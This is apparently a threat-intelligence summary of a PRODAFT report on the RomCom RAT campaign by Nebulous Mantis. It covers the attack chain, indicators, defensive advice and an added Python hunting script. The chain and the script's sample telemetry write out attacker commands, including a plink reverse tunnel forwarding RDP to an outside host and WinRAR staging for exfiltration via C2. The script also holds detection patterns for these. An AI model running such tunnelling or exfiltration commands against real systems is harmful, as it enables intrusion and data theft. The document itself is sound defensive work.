Threat Title: Nebulous Mantis Deploys RomCom RAT in Geopolitically Motivated Attacks
Date published: 2025/04/30
Source: https://catalyst.prodaft.com/public/report/inside-the-latest-espionage-campaign-of-nebulous-mantis/overview#heading-1000
Nebulous Mantis (aka Cuba, STORM-0978), a Russian-speaking cyber espionage group, has targeted NATO-aligned governments, defense organizations, and critical infrastructure since 2019 using the RomCom RAT and the Hancitor loader. The group delivers its malware through spear-phishing emails carrying weaponized documents, often impersonating legitimate services such as OneDrive. Since mid-2022 it has relied exclusively on RomCom, which employs Living off the Land (LOTL) tactics, encrypted C2 communications, and bulletproof hosting (e.g., LuxHost, AEZA) to evade detection. The malware uses multi-stage execution, including a downloader variant that fetches additional payloads via IPFS (e.g., ipfs.io, hardbin.com), and deploys tools such as Plink, WinRAR, and AD Explorer for lateral movement. RomCom's C2 panel ("Vanished ver. 1.1.3") gives operators granular victim management, including data exfiltration, ransomware deployment, and custom command execution. The group's double-extortion strategy combines data theft with ransomware (e.g., Cuba, Industrial Spy, Team Underground) and affects over 46 critical victims monthly. A key operator, LARVA-290, maintains the infrastructure, which suggests organizational maturity. Nebulous Mantis demonstrates advanced tradecraft, including COM hijacking for persistence, time-zone awareness to align activity with victims' business hours, and SSH tunneling via Plink for stealthy RDP access.
Initial Access
→ Spear-phishing email with a OneDrive-themed link
→ Lure document: "Situation_Details_April_25.pdf"
→ Redirects to Mediafire
→ Downloads "Side Effects Documentation feb25.exe" (downloader)
Execution
→ Downloader anti-sandbox check: RecentDocs registry key must hold more than 55 entries (few recent documents suggests an analysis VM)
→ Downloader contacts drivedefend[.]com
→ Keyprov.dll injected into explorer.exe
Persistence & C2
→ RomCom stage 1 calls opendnsapi.net
→ Retrieves tools via IPFS (ipfs.io, hardbin.com):
  - Plink (SSH tunneling)
  - WinRAR (data staging)
  - AD Explorer (lateral movement)
→ Drops binaries in C:\Users\Public\:
  - mfc86.exe, shbhost.exe (renamed payloads)
Lateral Movement
→ COM hijacking (registry CLSID; persistence)
→ SSH tunnel: plink -R 25671:[internal_IP]:3389 (reverse-forwards the victim's RDP port to the attacker's SSH server)
→ Net commands: net view /all \\TARGET
Exfiltration
→ Collects data to C:\Users\Public\Music\
→ Compresses with WinRAR (1.rar)
→ Exfiltrates via C2 (opendnsapi.net)
Impact
→ Deploys ransomware (Team Underground)
→ Encrypts files and posts to Data Leak Site (DLS)
RomCom enables persistent access, credential theft, and network compromise, and the ransomware deployment that follows disrupts operations. The group's focus on NATO entities and critical infrastructure poses risks to national security and economic stability.
To defend against threats like Nebulous Mantis, monitor for LOTL activity by tracking unusual process chains, renamed system tools in Public or temp folders, and unexpected IPFS or WebDAV connections. Block known bulletproof hosting providers and alert on outbound SSH reverse tunnels (plink -R). Train staff to spot fake cloud-storage lures. Maintain offline backups and restrict execution from public directories. Prioritize logging for discovery commands (net view, whoami /all) and time-zone checks (tzutil).
Additionally, deploy EDR solutions that can detect RomCom's anti-sandbox checks (e.g., RecentDocs registry queries) and inspect its XOR-encrypted C2 traffic. Isolate systems that execute AD Explorer or WinRAR from Public folders.
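As an added example (not code from the PRODAFT report or from any RomCom tooling), the following Python hunting script turns the recommendations above and the attack chain described earlier into concrete checks. It classifies process-creation records (Sysmon Event ID 1-style fields: image, command line, parent) for execution from C:\Users\Public\, plink reverse tunnels (-R), the discovery and time-zone commands named above, and WinRAR archive staging in the Public folder, and it flags HKCU CLSID InprocServer32 values that point to user-writable paths, which is the registry condition behind COM hijacking. The log records, the CLSID values, the IP addresses and the Keyprov.dll path are constructed for the example; the trusted-directory allowlist is an assumption to tune per environment.

```python
"""Hunting checks for the RomCom tradecraft described above (added example).

Inputs are process-creation records (Sysmon Event ID 1-style fields) and
HKCU CLSID InprocServer32 values collected from endpoints. All sample data
below is constructed for illustration, not taken from a real incident.
"""
from __future__ import annotations

import re
from typing import Iterable

PUBLIC_DIR = "c:\\users\\public\\"
# Where legitimately registered in-process COM servers normally live.
# This allowlist is an assumption for the example; tune it to your baseline.
TRUSTED_DLL_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# plink/ssh reverse tunnel: -R <listen_port>:<host>:<port> (case-sensitive:
# lower-case -r is WinRAR's recursion switch, not a tunnel).
REVERSE_TUNNEL_RE = re.compile(r"(?:^|\s)-R\s*\d+:[^\s:]+:\d+")
# Discovery and time-zone commands the recommendations say to log.
DISCOVERY_RES = (
    re.compile(r"\bnet(?:\.exe)?\"?\s+view\b", re.IGNORECASE),
    re.compile(r"\bwhoami(?:\.exe)?\"?\s+/all\b", re.IGNORECASE),
    re.compile(r"\btzutil(?:\.exe)?\b", re.IGNORECASE),
)
# WinRAR/rar "a" (add) verb writing a .rar archive.
RAR_ADD_RE = re.compile(r"\s+a\s+.*\.rar\b", re.IGNORECASE)


def _norm(path: str) -> str:
    """Lower-case and normalise separators so prefix checks are stable."""
    return path.lower().replace("/", "\\")


def classify_process(event: dict) -> list[str]:
    """Return the names of every rule a process-creation event trips."""
    image = _norm(event.get("image", ""))
    cmd = event.get("cmdline", "")
    hits: list[str] = []
    if image.startswith(PUBLIC_DIR):
        hits.append("exec_from_public_dir")
    if REVERSE_TUNNEL_RE.search(cmd):
        hits.append("ssh_reverse_tunnel")
    if any(rx.search(cmd) for rx in DISCOVERY_RES):
        hits.append("discovery_command")
    # Archive creation is only interesting when the tool or the data sits in Public.
    if RAR_ADD_RE.search(cmd) and (image.startswith(PUBLIC_DIR) or PUBLIC_DIR in _norm(cmd)):
        hits.append("rar_staging_in_public")
    return hits


def suspicious_com_entries(entries: Iterable[tuple[str, str]]) -> list[tuple[str, str]]:
    """Flag HKCU\\Software\\Classes\\CLSID\\<clsid>\\InprocServer32 values whose
    DLL lives outside the trusted directories.

    The per-user CLSID hive is writable by the user and is consulted before
    HKLM, which is what makes COM hijacking work; a server DLL registered
    there from a user-writable path is the thing to look at.
    """
    return [(clsid, dll) for clsid, dll in entries
            if not _norm(dll).startswith(TRUSTED_DLL_PREFIXES)]


def hunt(events: Iterable[dict], com_entries: Iterable[tuple[str, str]]) -> dict:
    """Run every rule and return only what fired."""
    return {
        "processes": [(e["image"], classify_process(e)) for e in events if classify_process(e)],
        "com_hijack_candidates": suspicious_com_entries(com_entries),
    }


# Constructed sample telemetry mirroring the chain above (IPs from the
# documentation ranges; CLSIDs are placeholders, not real hijacked classes).
SAMPLE_EVENTS = [
    {"image": r"C:\Users\Public\mfc86.exe",
     "cmdline": r"C:\Users\Public\mfc86.exe -R 25671:10.0.0.5:3389 -pw x op@203.0.113.10",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\net.exe", "cmdline": r"net view /all \\FILESRV01",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\tzutil.exe", "cmdline": "tzutil /g",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Users\Public\shbhost.exe",
     "cmdline": r"shbhost.exe a -r C:\Users\Public\1.rar C:\Users\Public\Music",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Program Files\WinRAR\WinRAR.exe",  # benign archive job, must not fire
     "cmdline": r"WinRAR.exe a D:\backup\docs.rar D:\docs",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami /all",
     "parent": r"C:\Windows\System32\cmd.exe"},
]
SAMPLE_COM_ENTRIES = [
    ("{00000000-0000-0000-0000-000000000001}", r"C:\Users\Public\Keyprov.dll"),
    ("{00000000-0000-0000-0000-000000000002}", r"C:\Windows\System32\shell32.dll"),
]

if __name__ == "__main__":
    result = hunt(SAMPLE_EVENTS, SAMPLE_COM_ENTRIES)
    for image, rules in result["processes"]:
        print(f"{image}: {', '.join(rules)}")
    for clsid, dll in result["com_hijack_candidates"]:
        print(f"COM hijack candidate {clsid} -> {dll}")
```

The benign WinRAR job from Program Files is included deliberately: the archive rule only fires when the binary or the data path is under Public, which keeps ordinary backup jobs out of the alert queue while still catching the renamed shbhost.exe staging run.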